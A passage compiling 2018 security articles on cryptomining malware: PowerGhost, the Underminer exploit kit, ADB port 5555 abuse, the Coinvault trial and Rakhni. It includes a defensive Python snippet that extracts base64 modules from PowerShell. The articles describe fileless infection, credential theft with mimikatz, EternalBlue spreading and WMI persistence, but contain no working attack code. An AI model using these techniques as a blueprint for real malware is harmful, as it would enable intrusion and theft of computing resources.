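        print(f"{f['status']} {f['url']} sitekey={f['sitekey']} "
              f"error_page={f['on_error_page']}")
    for key, hosts in shared.items():
        print(f"site key {key} injected on {len(hosts)} hosts: {sorted(hosts)}")
```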
A mining multitool
2.8.2018 Kaspersky Cryptocurrency
Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.
Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.
Fragment of the obfuscated script
The add-on modules encoded in base64
The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.
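The base64-encoded add-on modules are the first thing an analyst carves out of a script like this. The following is an added example, not Kaspersky's code: it finds long base64 runs in a PowerShell script, decodes them and classifies each blob as a PE module, a nested script or other binary; the loader script and the embedded modules are constructed stand-ins.

```python
"""Added example (not Kaspersky's code): pull base64-encoded modules out of a
PowerShell script and classify each decoded blob, the triage step performed on
a fileless miner that carries its PE modules inline.
The script and the embedded modules below are constructed for illustration."""
import base64
import binascii
import hashlib
import re
from typing import Dict, List

# PE modules run to tens of kilobytes, so only long base64 runs are candidates.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
DOS_STUB = b"This program cannot be run in DOS mode"


def _decode(chunk: str) -> bytes:
    """Decode a base64 run, tolerating stripped padding; b'' if not base64."""
    chunk = chunk.rstrip("=")
    chunk += "=" * (-len(chunk) % 4)
    try:
        return base64.b64decode(chunk, validate=True)
    except binascii.Error:
        return b""


def classify(blob: bytes) -> str:
    """Label a decoded blob: 'pe' (Windows executable), 'script' (text) or 'binary'."""
    if blob[:2] == b"MZ" or DOS_STUB in blob[:1024]:
        return "pe"
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return "script"
    return "binary"


def extract_embedded_modules(script: str) -> List[Dict]:
    """Return one record per embedded module: where it sits, what it is, its hash."""
    modules = []
    for m in B64_RUN.finditer(script):
        blob = _decode(m.group(0))
        if not blob:
            continue
        modules.append({
            "offset": m.start(),
            "encoded_len": len(m.group(0)),
            "decoded_len": len(blob),
            "kind": classify(blob),
            "sha256": hashlib.sha256(blob).hexdigest(),
        })
    return modules


# Constructed stand-in for a PE module: MZ header, zero padding, DOS stub text.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB + b".\r\n$" + b"\x00" * 16
# Constructed stand-in for a nested PowerShell module.
FAKE_NESTED_SCRIPT = (b"# constructed nested module\n"
                      b"function Invoke-Stage { Write-Output 'nested PowerShell module' }\n")

# Constructed loader in the style of a fileless miner that embeds its modules.
SAMPLE_SCRIPT = "\n".join([
    "# constructed loader: modules are embedded as base64 and decoded in memory",
    '$pe = [Convert]::FromBase64String("%s")' % base64.b64encode(FAKE_PE).decode(),
    '$ps = [Convert]::FromBase64String("%s")' % base64.b64encode(FAKE_NESTED_SCRIPT).decode(),
    "# short base64-looking tokens such as variable names are ignored",
    "$shortToken = 'QUJD'",
])

if __name__ == "__main__":
    for mod in extract_embedded_modules(SAMPLE_SCRIPT):
        print(mod)
```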
What the script does after that can be broken down into several stages:
Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.
Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
Payload. Lastly, the script launches the miner by loading a PE file via reflective PE injection.
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.
PowerShell function with the tell-tale name RunDDOS
It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.
Fragment of disassembled code of the file cohernece.txt
Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.
Geography of infections by the miner
PowerGhost is encountered most often in India, Brazil, Colombia and Turkey.
Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:
E-wallets at nanopool.org and minexmr.com:
Indicators of compromise
Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency
Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, and employs multiple fileless techniques to evade detection.
“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.
“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”
PowerGhost leverages the NSA-linked EternalBlue exploit to spread. It is an obfuscated PowerShell script containing the malware’s core code, along with many other add-on modules such as the miner, the miner’s libraries, the Mimikatz post-exploitation tool, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.
The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). Experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and execute it, with the entire process taking place in the memory of the system.
The first thing that the malware does is to check the command and control (C&C) server and, if a new version is available, download and execute it.
Then the malware uses the Mimikatz tool to get user account credentials from the machine and uses them to attempt lateral movement inside the target network.
“Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.
“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”
Once it has infected a machine, PowerGhost attempts to escalate privileges by using various exploits, such as the one for CVE-2018-8120.
In order to establish a foothold in the infected system, PowerGhost saves all the modules as properties of a WMI class, while the miner’s main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
The script executes the miner by loading a PE file via reflective PE injection.
Most of the PowerGhost infections were observed in India, Brazil, Colombia, and Turkey.
Experts also discovered a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky to believe that the authors attempted to create a DDoS-for-hire service.
Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Kaspersky.
Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency
The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.
The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.
The new threat proves once again that the growing popularity and rates of cryptocurrencies have led cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.
PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.
By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.
During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.
After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.
Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).
After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).
All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.
One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.
This DDoS function is the only one that copies files to the hard drive, and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware as an afterthought, because it is launched in a peculiar manner, where the DDoS module and a function to launch it are downloaded and saved to the disk separately.
To date, PowerGhost was mainly observed within corporate local area networks and has been mainly encountered in India, Brazil, Colombia, and Turkey.
Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency
New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.
“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”
Researchers first noticed Underminer exploit kit activity on July 17, when it was distributing the payloads mainly to Asian countries, mostly Japan (69,75%) and Taiwan (10,52%).
Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.
The Underminer exploit kit appears to have been created in November 2017, when it only included code for the exploitation of Flash vulnerabilities and used fileless payloads to deliver and execute the malware.
The Underminer EK includes functionalities also employed by other exploit kits, including:
browser profiling and filtering;
preventing of client revisits;
asymmetric encryption of payloads;
The EK redirects visitors to a landing page that profiles the user’s Adobe Flash Player version and browser type via the user-agent.
In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.
The Underminer exploit kit also sets a token in the browser cookie; with this trick, if the victim has already accessed the landing page, it only delivers an HTTP 404 error message instead of the payloads.
Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:
CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.
All the above flaws have been exploited by other EKs in the past.
Below is the infection flow of Underminer’s exploits as described by Trend Micro.
Underminer modus operandi
“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.
Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency
Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.
Following Apple’s decision in June to ban cryptocurrency mining apps, Google has also updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.
“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.
Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and, in some cases, could also damage it by causing overheating or destroying batteries.
In December, experts from Kaspersky spotted an Android malware dubbed Loapi that includes such an aggressive mining component that it can destroy your battery.
Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.
Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.
Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android Cryptocurrency
It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.
Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.
The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb). According to the Google developer portal,
“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”
These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tool is being used in a secured environment, it presents little risk. It is recommended that the adb service be disabled before releasing devices to consumers, and it is common for the adb service to be restricted to USB connectivity only.
In early June, security researcher Kevin Beaumont warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.
According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”
The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.
It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.
The Trend Micro researchers offer a few suggestions to reduce your risk:
On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you feel you are infected
Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device
The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.
Coinvault, the court case
19.7.2018 Kaspersky Cryptocurrency
Today, after almost 3 years of waiting, it was finally the day of the trial. In the Netherlands, where the whole case took place, the hearings are open to the public. Meaning anyone who is interested can visit. And it was quite busy. Because besides the suspects, their lawyers, the judges and the prosecutor there were also several members of the press, a sketch artist (to make a drawing of the suspects), several members of the Dutch police, a few victims and other people who were interested in the case.
The defence started by calling the public prosecution service “niet ontvankelijk” for one of the defendants, meaning they are not allowed to prosecute the case. The reason given was that one of the defendants was underage during some of the actions. However, all three of the judges also handle cases concerning underage defendants and, after a quick consultation with each other, they decided to continue.
The hearing was resumed with what the two brothers were accused of:
Breaking into computers;
Make other people’s work inaccessible;
Extortion of 1295 people.
For us it was quite interesting to understand how they came up with the number of 1295 people, because when we released our final decryption tool we had at least 14k keys. So most likely many more people were infected. In fact, we think a zero could be added to 1295 to give a more realistic view of the number of victims.
The judge then went on with what was basically a summary of the case: what happened, why they did certain things, etc. We as researchers often guess about the motives behind actions, but we can never be 100% certain until there is a confession from the criminal. One such example is the amount of ransom to pay. During the time this all took place the brothers wanted 1 bitcoin as a ransom, which was worth about 220 euro at the time. We always say that we believe ransomware criminals choose a relatively small amount to make it more attractive to pay. When the judge asked the same question they gave exactly this answer. Always good to see your theories being confirmed 🙂
Some other interesting facts were that the case file was too big to fit in a moving box, they made around 20k euro (10k each), they didn’t stop with making ransomware because of the technical challenges, they accepted the risk of C2 seizure and they didn’t really see the influence their actions had on the victims. One of the judges then asked how this was possible, because they had a helpdesk where victims could e-mail to in case they had problems. All their “helpdesk” replies were that the victims just had to pay. The answers they gave to the judge weren’t very convincing.
The suspects mentioned though that they started the helpdesk because their malware had some implementation mistakes (files were encrypted twice, for example). A consequence of this is that even today, despite the release of our decryption tool which has all the keys, some victims were not able to recover all of their files. There was even one victim who mentioned that he just deleted all of his files because he didn’t believe a decryption tool would become available.
Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path. When we worked with the police on this case they kindly asked us to remove that screenshot (which we did), so that the suspects didn’t realize they made a mistake. During the court case they mentioned that they read the blogpost and saw their name and they were on the edge of stopping their campaign, but ultimately decided not to.
It then continued with claims by victims who paid money to get their files back. One of the victims was interested in Bitcoin and decided to pay the ransom. However, he already had some bitcoins on his computer, which were stolen by the suspects (the software supported this functionality) and now he wanted his bitcoin back :). One other victim had his own company and this took place while he was on vacation. He wanted 5000 euro because the suspects ruined his vacation and with the 5000 euro he could go on vacation again.
Now it was time for the prosecutor: twelve months of jail time with all but three suspended. Effectively this comes down to three months – the time they already did * ⅔ = about two months of jail. The lawyers then requested (since they made a full confession, wanted to help the victims get their files back, etc.) many hours of community service. One of the reasons not to request jail time was: “Bitcryptor is not malware”. But BitCryptor was the follow-up of Coinvault, a different name for the same software. Nobody really understood the quote, except for the lawyer, since it was obviously malware and made some victims.
In two weeks, on the 26th of July at 13:00 CET we know the outcome.
Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency
A long-established ransomware family recently added the ability to deploy a cryptocurrency miner instead of a file encryptor, based on the victim machine’s configuration.
The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.
Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.
The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.
Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.
After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.
The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.
The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts the encryption process if the system has been idle for 2 minutes. The malware targets nearly 200 file types for encryption, uses the RSA-1024 encryption algorithm, and appends the .neitrino extension to the affected files.
The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.
“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.
The malware was also observed sending emails to a hardcoded address, to provide attackers with information such as computer name, IP address, the malware’s path on the system, date and time, and malware build date, in addition to providing details on the infection itself.
The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.
The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.